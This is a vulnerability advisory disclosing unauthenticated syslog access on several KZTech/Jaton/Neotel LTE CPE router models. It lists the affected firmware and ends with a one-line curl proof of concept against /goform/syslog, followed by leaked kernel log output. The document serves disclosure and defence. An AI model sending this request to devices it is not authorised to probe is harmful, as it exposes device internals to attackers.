
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Log Disclosure


Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The unprotected web management server is vulnerable to sensitive
information disclosure vulnerability. An unauthenticated attacker can
visit the syslog page and disclose the webserver's log file containing
system information running on the device.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5641
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5641.php


03.02.2021

--


$ curl -sk https://192.168.1.1/goform/syslog
00:00:17 CPE user.warn kernel: mtd .name = raspi, .size = 0x02000000 (0M) .erasesize = 0x00000020 (0K) .numeraseregions = 65536 May 23 00:00:17 CPE user.notice kernel: Creating 6 MTD partitions on "raspi": May 23 00:00:17 CPE user.notice kernel: 0x000000000000-0x000002000000 : "ALL" May 23 00:00:17 CPE user.notice kernel: 0x000000000000-0x000000040000 : "Bootloader" May 23 00:00:17 CPE user.notice kernel: 0x000000040000-0x0000000e0000 : "Config" May 23 00:00:17 CPE user.notice kernel: 0x0000000e0000-0x000000100000 : "Factory" May 23 00:00:17 CPE user.notice kernel: 0x000000100000-0x000001080000 : "Kernel" May 23 00:00:17 CPE user.notice kernel: 0x000001080000-0x000002000000 : "Kernel2" May 23 00:00:17 CPE user.warn kernel: rdm_major = 241 May 23 00:00:17 CPE user.warn kernel: SMACCR1 -- : 0x00006cad May 23 00:00:17 CPE user.warn kernel: SMACCR0 -- : 0xef150389 May 23 00:00:17 CPE user.warn kernel: Ralink APSoC Ethernet Driver Initilization. v3.0 256 rx/tx descriptors allocated, mtu = 1500! May 23 00:00:17 CPE user.warn kernel: SMACCR1 вЂ“
...
...
